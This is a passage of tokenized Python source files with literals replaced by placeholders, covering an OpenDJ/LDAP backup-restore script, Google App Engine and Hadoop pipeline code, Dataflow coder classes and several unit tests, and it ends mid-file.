( args ) : <EOL> try : <EOL> logging . debug ( "<STR_LIT>" % "<STR_LIT:U+0020>" . join ( args ) ) <EOL> output = os . popen ( "<STR_LIT:U+0020>" . join ( args ) ) . read ( ) . strip ( ) <EOL> return output <EOL> except : <EOL> logging . error ( "<STR_LIT>" % "<STR_LIT:U+0020>" . join ( args ) ) <EOL> logging . error ( traceback . format_exc ( ) ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> def restoreConfig ( ldifFolder , newLdif , ldifModFolder ) : <EOL> logging . info ( '<STR_LIT>' ) <EOL> ignoreList = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> current_config_dns = getDns ( newLdif ) <EOL> oldDnMap = getOldEntryMap ( ldifFolder ) <EOL> for dn in oldDnMap . keys ( ) : <EOL> old_entry = getEntry ( "<STR_LIT>" % ( ldifFolder , oldDnMap [ dn ] ) , dn ) <EOL> if dn not in current_config_dns : <EOL> addEntry ( dn , old_entry , ldifModFolder ) <EOL> continue <EOL> new_entry = getEntry ( newLdif , dn ) <EOL> for attr in old_entry . keys ( ) : <EOL> new_fn = str ( len ( dn . split ( '<STR_LIT:U+002C>' ) ) ) + '<STR_LIT:_>' + str ( uuid . uuid4 ( ) ) <EOL> filename = '<STR_LIT>' % ( ldifModFolder , new_fn ) <EOL> if attr in ignoreList : <EOL> continue <EOL> if attr not in new_entry : <EOL> writeMod ( dn , attr , old_entry [ attr ] , filename , True ) <EOL> logging . debug ( "<STR_LIT>" , attr , dn ) <EOL> elif old_entry [ attr ] != new_entry [ attr ] : <EOL> mod_list = None <EOL> if len ( old_entry [ attr ] ) == <NUM_LIT:1> : <EOL> try : <EOL> logging . debug ( "<STR_LIT>" , attr ) <EOL> old_json = json . loads ( old_entry [ attr ] [ <NUM_LIT:0> ] ) <EOL> new_json = json . loads ( new_entry [ attr ] [ <NUM_LIT:0> ] ) <EOL> new_json = merge ( new_json , old_json ) <EOL> mod_list = [ json . dumps ( new_json ) ] <EOL> except : <EOL> mod_list = old_entry [ attr ] <EOL> logging . debug ( "<STR_LIT>" , attr ) <EOL> else : <EOL> mod_list = old_entry [ attr ] <EOL> logging . debug ( "<STR_LIT>" , attr ) <EOL> writeMod ( dn , attr , mod_list , filename ) <EOL> def startOpenDJ ( ) : <EOL> logging . info ( '<STR_LIT>' ) <EOL> output = getOutput ( [ service , '<STR_LIT>' , '<STR_LIT:start>' ] ) <EOL> if output . find ( "<STR_LIT>" ) > <NUM_LIT:0> : <EOL> logging . info ( "<STR_LIT>" ) <EOL> else : <EOL> logging . critical ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:2> ) <EOL> def stopOpenDJ ( ) : <EOL> logging . info ( '<STR_LIT>' ) <EOL> output = getOutput ( [ service , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> if output . find ( "<STR_LIT>" ) > <NUM_LIT:0> : <EOL> logging . info ( "<STR_LIT>" ) <EOL> else : <EOL> logging . critical ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:3> ) <EOL> def tab_attr ( attr , value , encoded = False ) : <EOL> lines = [ '<STR_LIT>' % attr ] <EOL> if encoded : <EOL> lines = [ '<STR_LIT>' % attr ] <EOL> for char in value : <EOL> current_line = lines [ - <NUM_LIT:1> ] <EOL> if len ( current_line ) < <NUM_LIT> : <EOL> new_line = current_line + char <EOL> del lines [ - <NUM_LIT:1> ] <EOL> lines . append ( new_line ) <EOL> else : <EOL> lines . append ( "<STR_LIT:U+0020>" + char ) <EOL> return "<STR_LIT:\n>" . join ( lines ) <EOL> def uploadLDIF ( ldifFolder , outputLdifFolder ) : <EOL> logging . info ( '<STR_LIT>' ) <EOL> files = sorted ( os . listdir ( outputLdifFolder ) ) <EOL> for fn in files : <EOL> cmd = [ ldapmodify ] + ldap_creds + [ '<STR_LIT>' , '<STR_LIT>' , <EOL> "<STR_LIT>" % ( outputLdifFolder , fn ) ] <EOL> output = getOutput ( cmd ) <EOL> if output : <EOL> logging . debug ( output ) <EOL> else : <EOL> logging . error ( "<STR_LIT>" , fn ) <EOL> def walk_function ( a , directory , files ) : <EOL> if '<STR_LIT>' in current_version and '<STR_LIT>' not in backup_version : <EOL> ignore_folders = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> for folder in ignore_folders : <EOL> if folder in directory : <EOL> return <EOL> for f in files : <EOL> if f in ignore_files : <EOL> continue <EOL> fn = "<STR_LIT>" % ( directory , f ) <EOL> targetFn = fn . replace ( backup24_folder , '<STR_LIT>' ) <EOL> if os . path . isdir ( fn ) : <EOL> if not os . path . exists ( targetFn ) : <EOL> os . mkdir ( targetFn ) <EOL> else : <EOL> try : <EOL> logging . debug ( "<STR_LIT>" , targetFn ) <EOL> shutil . copyfile ( fn , targetFn ) <EOL> except : <EOL> logging . error ( "<STR_LIT>" , targetFn ) <EOL> def writeMod ( dn , attr , value_list , fn , add = False ) : <EOL> operation = "<STR_LIT:replace>" <EOL> if add : <EOL> operation = "<STR_LIT>" <EOL> modLdif = """<STR_LIT>""" % ( dn , operation , attr ) <EOL> if value_list is None : <EOL> logging . warning ( '<STR_LIT>' , attr ) <EOL> return <EOL> for val in value_list : <EOL> modLdif = modLdif + getMod ( attr , val ) <EOL> modLdif = modLdif + "<STR_LIT:\n>" <EOL> f = open ( fn , '<STR_LIT:w>' ) <EOL> f . write ( modLdif ) <EOL> f . close ( ) <EOL> logging . debug ( '<STR_LIT>' , attr , fn ) <EOL> def stopTomcat ( ) : <EOL> logging . info ( '<STR_LIT>' ) <EOL> output = getOutput ( [ service , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> logging . debug ( output ) <EOL> def startTomcat ( ) : <EOL> logging . info ( '<STR_LIT>' ) <EOL> output = getOutput ( [ service , '<STR_LIT>' , '<STR_LIT:start>' ] ) <EOL> logging . debug ( output ) <EOL> def preparePasswordFile ( ) : <EOL> with open ( '<STR_LIT>' , '<STR_LIT:r>' ) as sfile : <EOL> for line in sfile : <EOL> if '<STR_LIT>' in line : <EOL> with open ( password_file , '<STR_LIT:w>' ) as pfile : <EOL> pfile . write ( line . split ( '<STR_LIT:=>' ) [ - <NUM_LIT:1> ] ) <EOL> break <EOL> def getCurrentVersion ( ) : <EOL> with open ( '<STR_LIT>' , '<STR_LIT:r>' ) as f : <EOL> for line in f : <EOL> if '<STR_LIT>' in line : <EOL> return line . split ( '<STR_LIT::>' ) [ - <NUM_LIT:1> ] . strip ( ) <EOL> def getBackupVersion ( ) : <EOL> with open ( os . path . join ( backup24_folder , '<STR_LIT>' ) , '<STR_LIT:r>' ) as f : <EOL> for line in f : <EOL> if '<STR_LIT>' in line : <EOL> return line . split ( '<STR_LIT:=>' ) [ - <NUM_LIT:1> ] . strip ( ) <EOL> def main ( folder_name ) : <EOL> global backup24_folder , backup_version , current_version , service <EOL> backup24_folder = folder_name <EOL> if not os . path . exists ( backup24_folder ) : <EOL> logging . critical ( "<STR_LIT>" , backup24_folder ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> etc_folder = os . path . join ( backup24_folder , '<STR_LIT>' ) <EOL> opt_folder = os . path . join ( backup24_folder , '<STR_LIT>' ) <EOL> ldif_folder = os . path . join ( backup24_folder , '<STR_LIT>' ) <EOL> if not ( os . path . exists ( etc_folder ) and os . path . exists ( opt_folder ) and <EOL> os . path . exists ( ldif_folder ) ) : <EOL> logging . critical ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> backup_version = getBackupVersion ( ) <EOL> current_version = getCurrentVersion ( ) <EOL> if '<STR_LIT>' in current_version and '<STR_LIT>' not in backup_version : <EOL> skip_files = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> global ignore_files <EOL> ignore_files += skip_files <EOL> outputFolder = "<STR_LIT>" <EOL> outputLdifFolder = "<STR_LIT>" % outputFolder <EOL> newLdif = "<STR_LIT>" % outputFolder <EOL> if not os . path . exists ( outputFolder ) : <EOL> os . mkdir ( outputFolder ) <EOL> if not os . path . exists ( outputLdifFolder ) : <EOL> os . mkdir ( outputLdifFolder ) <EOL> service = getOutput ( [ '<STR_LIT>' , '<STR_LIT>' ] ) . split ( '<STR_LIT:U+0020>' ) [ <NUM_LIT:1> ] . strip ( ) <EOL> stopTomcat ( ) <EOL> preparePasswordFile ( ) <EOL> stopOpenDJ ( ) <EOL> copyFiles ( backup24_folder ) <EOL> startOpenDJ ( ) <EOL> getNewConfig ( newLdif ) <EOL> restoreConfig ( ldif_folder , newLdif , outputLdifFolder ) <EOL> uploadLDIF ( ldif_folder , outputLdifFolder ) <EOL> startTomcat ( ) <EOL> os . remove ( password_file ) <EOL> logging . info ( "<STR_LIT>" ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> if len ( sys . argv ) != <NUM_LIT:2> : <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> else : <EOL> main ( sys . argv [ <NUM_LIT:1> ] ) </s>
<s> import string <EOL> """<STR_LIT>""" <EOL> leadins = """<STR_LIT>""" <EOL> subjects = """<STR_LIT>""" <EOL> verbs = """<STR_LIT>""" <EOL> objects = """<STR_LIT>""" <EOL> import textwrap , random <EOL> from itertools import chain , islice , izip <EOL> def generate_chomsky ( times = <NUM_LIT:5> , line_length = <NUM_LIT> ) : <EOL> parts = [ ] <EOL> for part in ( leadins , subjects , verbs , objects ) : <EOL> phraselist = map ( str . strip , part . splitlines ( ) ) <EOL> random . shuffle ( phraselist ) <EOL> parts . append ( phraselist ) <EOL> output = chain ( * islice ( izip ( * parts ) , <NUM_LIT:0> , times ) ) <EOL> return textwrap . fill ( string . join ( output ) , line_length ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> generate_chomsky ( ) </s>
<s> """<STR_LIT>""" <EOL> import cStringIO <EOL> import json <EOL> from google . appengine . ext import ndb <EOL> import logging <EOL> from lib . crud import crud_handler <EOL> from lib . crud import crud_model <EOL> from lib . crud import crud_test <EOL> class SampleNdb ( crud_model . CrudNdbModel ) : <EOL> name = ndb . StringProperty ( ) <EOL> count = ndb . IntegerProperty ( ) <EOL> class CrudHandlerTest ( crud_test . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def assertJsonReplyEqual ( self , ans , expected ) : <EOL> """<STR_LIT>""" <EOL> self . assertTrue ( ans . startswith ( crud_handler . JSON_PREFIX ) ) <EOL> self . assertTrue ( expected . startswith ( crud_handler . JSON_PREFIX ) ) <EOL> ans = json . loads ( ans [ len ( crud_handler . JSON_PREFIX ) : ] ) <EOL> expected = json . loads ( expected [ len ( crud_handler . JSON_PREFIX ) : ] ) <EOL> self . assertSameStructure ( ans , expected ) <EOL> def testGetNew ( self ) : <EOL> handler = crud_handler . GetCrudHandler ( SampleNdb ) ( ) <EOL> handler . request = { '<STR_LIT:id>' : '<STR_LIT>' } <EOL> class MockResponse ( object ) : <EOL> out = cStringIO . StringIO ( ) <EOL> headers = { } <EOL> handler . response = MockResponse ( ) <EOL> handler . get ( ) <EOL> ans = handler . response . out . getvalue ( ) <EOL> expected = """<STR_LIT>""" <EOL> self . assertJsonReplyEqual ( ans , expected ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> crud_test . main ( ) </s>
<s> """<STR_LIT>""" <EOL> import json <EOL> import mock <EOL> from src import basetest <EOL> from src . hadoop import datastore <EOL> from src . hadoop import hadoop_csv_transformer <EOL> class HadoopCsvTransformerTest ( basetest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> super ( HadoopCsvTransformerTest , self ) . setUp ( ) <EOL> self . mock_gcs_new = mock . patch ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) . start ( ) <EOL> self . mock_gcs = self . mock_gcs_new . return_value <EOL> self . mock_urlopen = mock . patch ( '<STR_LIT>' ) . start ( ) <EOL> self . mock_urlopen . return_value . read . return_value = '<STR_LIT>' <EOL> self . mock_sleep = mock . patch ( '<STR_LIT>' ) . start ( ) <EOL> self . transform_config = { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> def tearDown ( self ) : <EOL> super ( HadoopCsvTransformerTest , self ) . tearDown ( ) <EOL> mock . patch . stopall ( ) <EOL> def testTransform_NoHadoopCluster ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( hadoop_csv_transformer . HadoopError , <EOL> hadoop_csv_transformer . HadoopCsvTransformer , <EOL> self . transform_config ) <EOL> def testTransform ( self ) : <EOL> """<STR_LIT>""" <EOL> cluster_info = datastore . ClusterInfo ( ) <EOL> cluster_info . put ( ) <EOL> instance_info = datastore . InstanceInfo ( ) <EOL> instance_info . put ( ) <EOL> cluster_info . SetMasterInstance ( instance_info ) <EOL> cluster_info . SetMasterIpAddress ( '<STR_LIT>' ) <EOL> transformer = hadoop_csv_transformer . HadoopCsvTransformer ( <EOL> self . transform_config ) <EOL> transformer . StartTransform ( ) <EOL> self . assertEqual ( <NUM_LIT:1> , self . mock_gcs_new . call_count ) <EOL> self . mock_gcs . OpenObject . assert_any_call ( '<STR_LIT>' ) <EOL> self . mock_gcs . OpenObject . assert_any_call ( '<STR_LIT>' , mode = '<STR_LIT:w>' ) <EOL> self . mock_gcs . OpenObject . assert_any_call ( <EOL> '<STR_LIT>' , mode = '<STR_LIT:w>' ) <EOL> self . assertEqual ( <NUM_LIT:2> , self . mock_urlopen . call_count ) <EOL> request = self . mock_urlopen . call_args_list [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> self . assertEqual ( '<STR_LIT>' , <EOL> request . get_full_url ( ) ) <EOL> self . assertEqual ( <EOL> <NUM_LIT:0> , request . headers [ '<STR_LIT>' ] . find ( '<STR_LIT>' ) ) <EOL> body = self . mock_urlopen . call_args_list [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] <EOL> self . assertNotEqual ( - <NUM_LIT:1> , body . find ( json . dumps ( self . transform_config ) ) ) <EOL> self . assertEqual ( '<STR_LIT>' , <EOL> self . mock_urlopen . call_args_list [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( <NUM_LIT:1> , self . mock_sleep . call_count ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> basetest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> import contextlib <EOL> import cStringIO as StringIO <EOL> import csv <EOL> from google . appengine . ext import ndb <EOL> from src . clients import gcs <EOL> from src . pipelines import pipeline <EOL> class DatastoreInput ( pipeline . Pipeline ) : <EOL> """<STR_LIT>""" <EOL> @ staticmethod <EOL> def GetHelp ( ) : <EOL> return """<STR_LIT>""" <EOL> def run ( self , config ) : <EOL> """<STR_LIT>""" <EOL> storage = gcs . Gcs ( ) <EOL> gql = config . get ( '<STR_LIT>' ) <EOL> if not gql : <EOL> with contextlib . closing ( <EOL> storage . OpenObject ( url = config [ '<STR_LIT:object>' ] ) ) as stream : <EOL> with contextlib . closing ( StringIO . StringIO ( ) ) as gql_buf : <EOL> while True : <EOL> buf = stream . read ( gcs . Gcs . READ_CHUNK_SIZE ) <EOL> if buf and len ( buf ) : <EOL> gql_buf . write ( buf ) <EOL> else : <EOL> break <EOL> gql = gql_buf . getvalue ( ) <EOL> qkwargs = { } <EOL> consistency = None <EOL> keys_only = False <EOL> projection = None <EOL> if '<STR_LIT>' in config : <EOL> params = config [ '<STR_LIT>' ] <EOL> qkwargs = params . get ( '<STR_LIT>' , { } ) <EOL> consistency = params . get ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' in params and params [ '<STR_LIT>' ] is '<STR_LIT>' : <EOL> consistency = ndb . EVENTUAL_CONSISTENCY <EOL> keys_only = params . get ( '<STR_LIT>' , False ) <EOL> projection = params . get ( '<STR_LIT>' ) <EOL> writer = None <EOL> with contextlib . closing ( StringIO . StringIO ( ) ) as buf : <EOL> query = ndb . gql ( gql , ** qkwargs ) <EOL> for entity in query . iter ( read_policy = consistency , <EOL> keys_only = keys_only , <EOL> projection = projection ) : <EOL> if not projection : <EOL> projection = entity . _properties . keys ( ) <EOL> if not writer : <EOL> writer = csv . DictWriter ( buf , projection ) <EOL> headers = dict ( ( p , p ) for p in projection ) <EOL> writer . writerow ( headers ) <EOL> writer . writerow ( entity . to_dict ( ) ) <EOL> buf . seek ( <NUM_LIT:0> ) <EOL> storage . InsertObject ( buf , url = config [ '<STR_LIT>' ] [ <NUM_LIT:0> ] ) <EOL> def Lint ( self , linter ) : <EOL> """<STR_LIT>""" <EOL> linter . AtLeastOneFieldRequiredCheck ( [ '<STR_LIT>' , '<STR_LIT:object>' ] ) <EOL> linter . FieldCheck ( '<STR_LIT>' ) <EOL> linter . FieldCheck ( '<STR_LIT:object>' , validator = gcs . Gcs . UrlToBucketAndName ) <EOL> linter . FieldCheck ( '<STR_LIT>' , field_type = dict ) <EOL> linter . FieldCheck ( '<STR_LIT>' , field_type = dict ) <EOL> linter . FieldCheck ( '<STR_LIT>' , field_type = list , list_min = <NUM_LIT:1> ) <EOL> linter . FieldCheck ( '<STR_LIT>' , validator = self . ValidateConsistency ) <EOL> def ValidateConsistency ( self , consistency ) : <EOL> if consistency != '<STR_LIT>' and consistency != '<STR_LIT>' : <EOL> raise ValueError ( <EOL> '<STR_LIT>' % consistency ) </s>
<s> """<STR_LIT>""" <EOL> import collections <EOL> from cPickle import loads , dumps <EOL> try : <EOL> from google . cloud . dataflow . transforms . window import WindowedValue <EOL> except ImportError : <EOL> WindowedValue = collections . namedtuple ( <EOL> '<STR_LIT>' , ( '<STR_LIT:value>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> try : <EOL> from stream import InputStream as create_InputStream <EOL> from stream import OutputStream as create_OutputStream <EOL> except ImportError : <EOL> from slow_stream import InputStream as create_InputStream <EOL> from slow_stream import OutputStream as create_OutputStream <EOL> class CoderImpl ( object ) : <EOL> def encode_to_stream ( self , value , stream , nested ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def decode_from_stream ( self , stream , nested ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def encode ( self , value ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def decode ( self , encoded ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> class SimpleCoderImpl ( CoderImpl ) : <EOL> """<STR_LIT>""" <EOL> def encode_to_stream ( self , value , stream , nested ) : <EOL> """<STR_LIT>""" <EOL> stream . write ( self . encode ( value ) , nested ) <EOL> def decode_from_stream ( self , stream , nested ) : <EOL> """<STR_LIT>""" <EOL> return self . decode ( stream . read_all ( nested ) ) <EOL> class StreamCoderImpl ( CoderImpl ) : <EOL> """<STR_LIT>""" <EOL> def encode ( self , value ) : <EOL> out = create_OutputStream ( ) <EOL> self . encode_to_stream ( value , out , False ) <EOL> return out . get ( ) <EOL> def decode ( self , encoded ) : <EOL> return self . decode_from_stream ( create_InputStream ( encoded ) , False ) <EOL> class CallbackCoderImpl ( CoderImpl ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , encoder , decoder ) : <EOL> self . _encoder = encoder <EOL> self . _decoder = decoder <EOL> def encode_to_stream ( self , value , stream , nested ) : <EOL> return stream . write ( self . _encoder ( value ) , nested ) <EOL> def decode_from_stream ( self , stream , nested ) : <EOL> return self . _decoder ( stream . read_all ( nested ) ) <EOL> def encode ( self , value ) : <EOL> return self . _encoder ( value ) <EOL> def decode ( self , encoded ) : <EOL> return self . _decoder ( encoded ) <EOL> class DeterministicPickleCoderImpl ( CoderImpl ) : <EOL> def __init__ ( self , pickle_coder , step_label ) : <EOL> self . _pickle_coder = pickle_coder <EOL> self . _step_label = step_label <EOL> def _check_safe ( self , value ) : <EOL> if isinstance ( value , ( str , unicode , long , int , float ) ) : <EOL> pass <EOL> elif value is None : <EOL> pass <EOL> elif isinstance ( value , ( tuple , list ) ) : <EOL> for x in value : <EOL> self . _check_safe ( x ) <EOL> else : <EOL> raise TypeError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % ( <EOL> value , type ( value ) , self . _step_label ) ) <EOL> def encode_to_stream ( self , value , stream , nested ) : <EOL> self . _check_safe ( value ) <EOL> return self . _pickle_coder . encode_to_stream ( value , stream , nested ) <EOL> def decode_from_stream ( self , stream , nested ) : <EOL> return self . _pickle_coder . decode_from_stream ( stream , nested ) <EOL> def encode ( self , value ) : <EOL> self . _check_safe ( value ) <EOL> return self . _pickle_coder . encode ( value ) <EOL> def decode ( self , encoded ) : <EOL> return self . _pickle_coder . decode ( encoded ) <EOL> class BytesCoderImpl ( CoderImpl ) : <EOL> """<STR_LIT>""" <EOL> def encode_to_stream ( self , value , out , nested ) : <EOL> out . write ( value , nested ) <EOL> def decode_from_stream ( self , in_stream , nested ) : <EOL> return in_stream . read_all ( nested ) <EOL> def encode ( self , value ) : <EOL> assert isinstance ( value , bytes ) , ( value , type ( value ) ) <EOL> return value <EOL> def decode ( self , encoded ) : <EOL> return encoded <EOL> class FloatCoderImpl ( StreamCoderImpl ) : <EOL> def encode_to_stream ( self , value , out , nested ) : <EOL> out . write_bigendian_double ( value ) <EOL> def decode_from_stream ( self , in_stream , nested ) : <EOL> return in_stream . read_bigendian_double ( ) <EOL> class TimestampCoderImpl ( StreamCoderImpl ) : <EOL> def __init__ ( self , timestamp_class ) : <EOL> self . timestamp_class = timestamp_class <EOL> def encode_to_stream ( self , value , out , nested ) : <EOL> out . write_bigendian_int64 ( value . micros ) <EOL> def decode_from_stream ( self , in_stream , nested ) : <EOL> return self . timestamp_class ( micros = in_stream . read_bigendian_int64 ( ) ) <EOL> small_ints = [ chr ( _ ) for _ in range ( <NUM_LIT> ) ] <EOL> class VarIntCoderImpl ( StreamCoderImpl ) : <EOL> """<STR_LIT>""" <EOL> def encode_to_stream ( self , value , out , nested ) : <EOL> out . write_var_int64 ( value ) <EOL> def decode_from_stream ( self , in_stream , nested ) : <EOL> return in_stream . read_var_int64 ( ) <EOL> def encode ( self , value ) : <EOL> ivalue = value <EOL> if <NUM_LIT:0> <= ivalue < len ( small_ints ) : <EOL> return small_ints [ ivalue ] <EOL> else : <EOL> return StreamCoderImpl . encode ( self , value ) <EOL> def decode ( self , encoded ) : <EOL> if len ( encoded ) == <NUM_LIT:1> : <EOL> i = ord ( encoded ) <EOL> if <NUM_LIT:0> <= i < <NUM_LIT> : <EOL> return i <EOL> return StreamCoderImpl . decode ( self , encoded ) <EOL> class AbstractComponentCoderImpl ( StreamCoderImpl ) : <EOL> def __init__ ( self , coder_impls ) : <EOL> for c in coder_impls : <EOL> assert isinstance ( c , CoderImpl ) , c <EOL> self . _coder_impls = tuple ( coder_impls ) <EOL> def _extract_components ( self , value ) : <EOL> raise NotImplementedError <EOL> def _construct_from_components ( self , components ) : <EOL> raise NotImplementedError <EOL> def encode_to_stream ( self , value , out , nested ) : <EOL> values = self . _extract_components ( value ) <EOL> if len ( self . _coder_impls ) != len ( values ) : <EOL> raise ValueError ( <EOL> '<STR_LIT>' ) <EOL> for i in range ( <NUM_LIT:0> , len ( self . _coder_impls ) ) : <EOL> c = self . _coder_impls [ i ] <EOL> c . encode_to_stream ( values [ i ] , out , True ) <EOL> def decode_from_stream ( self , in_stream , nested ) : <EOL> return self . _construct_from_components ( <EOL> [ c . decode_from_stream ( in_stream , True ) for c in self . _coder_impls ] ) <EOL> class TupleCoderImpl ( AbstractComponentCoderImpl ) : <EOL> """<STR_LIT>""" <EOL> def _extract_components ( self , value ) : <EOL> return value <EOL> def _construct_from_components ( self , components ) : <EOL> return tuple ( components ) <EOL> class WindowedValueCoderImpl ( AbstractComponentCoderImpl ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , wrapped_value_coder , timestamp_coder , window_coder ) : <EOL> super ( WindowedValueCoderImpl , self ) . __init__ ( <EOL> ( wrapped_value_coder , timestamp_coder , window_coder ) ) <EOL> self . wrapped_value_coder = wrapped_value_coder <EOL> self . timestamp_coder = timestamp_coder <EOL> self . window_coder = window_coder <EOL> def _extract_components ( self , value ) : <EOL> return [ value . value , value . timestamp , value . windows ] <EOL> def _construct_from_components ( self , components ) : <EOL> return WindowedValue ( components [ <NUM_LIT:0> ] , <EOL> components [ <NUM_LIT:1> ] , <EOL> components [ <NUM_LIT:2> ] ) </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import unittest <EOL> import google . cloud . dataflow as df <EOL> from google . cloud . dataflow . examples . cookbook import bigquery_side_input <EOL> class BigQuerySideInputTest ( unittest . TestCase ) : <EOL> def test_create_groups ( self ) : <EOL> p = df . Pipeline ( '<STR_LIT>' ) <EOL> group_ids_pcoll = p | df . Create ( '<STR_LIT>' , [ '<STR_LIT:A>' , '<STR_LIT:B>' , '<STR_LIT:C>' ] ) <EOL> corpus_pcoll = p | df . Create ( '<STR_LIT>' , <EOL> [ { '<STR_LIT:f>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:f>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:f>' : '<STR_LIT>' } ] ) <EOL> words_pcoll = p | df . Create ( '<STR_LIT>' , [ { '<STR_LIT:f>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:f>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:f>' : '<STR_LIT>' } ] ) <EOL> ignore_corpus_pcoll = p | df . Create ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> ignore_word_pcoll = p | df . Create ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> groups = bigquery_side_input . create_groups ( group_ids_pcoll , corpus_pcoll , <EOL> words_pcoll , ignore_corpus_pcoll , <EOL> ignore_word_pcoll ) <EOL> def group_matcher ( actual ) : <EOL> self . assertEqual ( len ( actual ) , <NUM_LIT:3> ) <EOL> for group in actual : <EOL> self . assertEqual ( len ( group ) , <NUM_LIT:3> ) <EOL> self . assertTrue ( group [ <NUM_LIT:1> ] . startswith ( '<STR_LIT>' ) ) <EOL> self . assertNotEqual ( group [ <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> self . assertTrue ( group [ <NUM_LIT:2> ] . startswith ( '<STR_LIT>' ) ) <EOL> self . assertNotEqual ( group [ <NUM_LIT:2> ] , '<STR_LIT>' ) <EOL> df . assert_that ( groups , group_matcher ) <EOL> p . run ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> logging . getLogger ( ) . setLevel ( logging . INFO ) <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> import collections <EOL> import logging <EOL> import re <EOL> import tempfile <EOL> import unittest <EOL> from google . cloud . dataflow . examples import wordcount <EOL> class WordCountTest ( unittest . TestCase ) : <EOL> SAMPLE_TEXT = '<STR_LIT>' <EOL> def create_temp_file ( self , contents ) : <EOL> with tempfile . NamedTemporaryFile ( delete = False ) as f : <EOL> f . write ( contents ) <EOL> return f . name <EOL> def test_basics ( self ) : <EOL> temp_path = self . create_temp_file ( self . SAMPLE_TEXT ) <EOL> expected_words = collections . defaultdict ( int ) <EOL> for word in re . findall ( r'<STR_LIT>' , self . SAMPLE_TEXT ) : <EOL> expected_words [ word ] += <NUM_LIT:1> <EOL> wordcount . run ( [ <EOL> '<STR_LIT>' % temp_path , <EOL> '<STR_LIT>' % temp_path ] ) <EOL> results = [ ] <EOL> with open ( temp_path + '<STR_LIT>' ) as result_file : <EOL> for line in result_file : <EOL> match = re . search ( r'<STR_LIT>' , line ) <EOL> if match is not None : <EOL> results . append ( ( match . group ( <NUM_LIT:1> ) , int ( match . group ( <NUM_LIT:2> ) ) ) ) <EOL> self . assertEqual ( sorted ( results ) , sorted ( expected_words . iteritems ( ) ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> logging . getLogger ( ) . setLevel ( logging . INFO ) <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import multiprocessing <EOL> import os <EOL> import random <EOL> import threading <EOL> import unittest <EOL> from google . cloud . dataflow . io import gcsio <EOL> from google . cloud . dataflow . internal . clients import storage <EOL> class FakeGcsClient ( object ) : <EOL> def __init__ ( self ) : <EOL> self . objects = FakeGcsObjects ( ) <EOL> class FakeFile ( object ) : <EOL> def __init__ ( self , bucket , obj , contents , generation ) : <EOL> self . bucket = bucket <EOL> self . object = obj <EOL> self . contents = contents <EOL> self . generation = generation <EOL> def get_metadata ( self ) : <EOL> return storage . Object ( bucket = self . bucket , <EOL> name = self . object , <EOL> generation = self . generation , <EOL> size = len ( self . contents ) ) <EOL> class FakeGcsObjects ( object ) : <EOL> def __init__ ( self ) : <EOL> self . files = { } <EOL> self . list_page_tokens = { } <EOL> def add_file ( self , f ) : <EOL> self . files [ ( f . bucket , f . object ) ] = f <EOL> def get_file ( self , bucket , obj ) : <EOL> return self . files . get ( ( bucket , obj ) , None ) <EOL> def Get ( self , get_request , download = None ) : <EOL> f = self . get_file ( get_request . bucket , get_request . object ) <EOL> if f is None : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if download is None : <EOL> return f . get_metadata ( ) <EOL> else : <EOL> stream = download . stream <EOL> def get_range_callback ( start , end ) : <EOL> assert start >= <NUM_LIT:0> and end >= start and end < len ( f . contents ) <EOL> stream . write ( f . contents [ start : end 